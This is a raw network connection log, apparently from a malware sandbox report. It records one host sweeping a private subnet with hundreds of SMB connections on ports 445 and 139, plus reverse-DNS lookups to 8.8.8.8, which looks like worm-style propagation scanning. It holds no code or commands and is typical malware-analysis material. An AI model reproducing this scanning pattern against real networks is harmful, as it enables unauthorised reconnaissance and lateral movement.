N/A 10.127.0.18:139 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.79:139 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.82:445 tcp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.88:139 tcp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.92:139 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.95:445 tcp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.102:445 tcp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.108:139 tcp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.37:139 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:445 tcp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.41:139 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.122:445 tcp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.128:139 tcp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.49:139 tcp
N/A 10.127.0.47:139 tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.134:139 tcp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
N/A 10.127.0.135:445 tcp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
N/A 10.127.0.135:139 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.140:139 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.141:139 tcp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.55:139 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.148:445 tcp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.59:139 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.155:445 tcp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.63:139 tcp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.161:139 tcp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.67:139 tcp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.167:139 tcp
N/A 10.127.0.168:445 tcp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.75:139 tcp
N/A 10.127.0.71:139 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.173:139 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.174:139 tcp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
N/A 10.127.0.175:445 tcp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
N/A 10.127.0.175:139 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.79:139 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.180:139 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.181:139 tcp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.185:139 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.187:139 tcp
N/A 10.127.0.188:445 tcp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
N/A 10.127.0.188:139 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.189:139 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.193:139 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.194:139 tcp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.88:139 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.197:139 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.200:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.201:139 tcp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.202:139 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.92:139 tcp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.204:139 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.207:139 tcp
N/A 10.127.0.208:445 tcp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
N/A 10.127.0.208:139 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.209:139 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.213:139 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.214:139 tcp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.221:445 tcp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
N/A 10.127.0.221:139 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.226:139 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.228:445 tcp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.108:139 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.233:139 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.234:139 tcp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.240:139 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.241:139 tcp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.242:139 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.243:139 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.244:139 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.245:139 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.246:139 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.247:139 tcp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.248:139 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.249:139 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.250:139 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.251:139 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.252:139 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.253:139 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.254:139 tcp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.255:139 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.1.0:445 tcp
N/A 10.127.1.0:139 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.1:139 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.2:139 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.3:139 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.4:139 tcp
N/A 10.127.1.5:445 tcp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
N/A 10.127.1.5:139 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.1.6:139 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.128:139 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.7:139 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.8:139 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.9:139 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.10:139 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.11:139 tcp
N/A 10.127.1.12:445 tcp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
N/A 10.127.1.12:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.1.13:139 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.14:139 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.15:139 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.16:139 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.17:139 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.18:139 tcp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
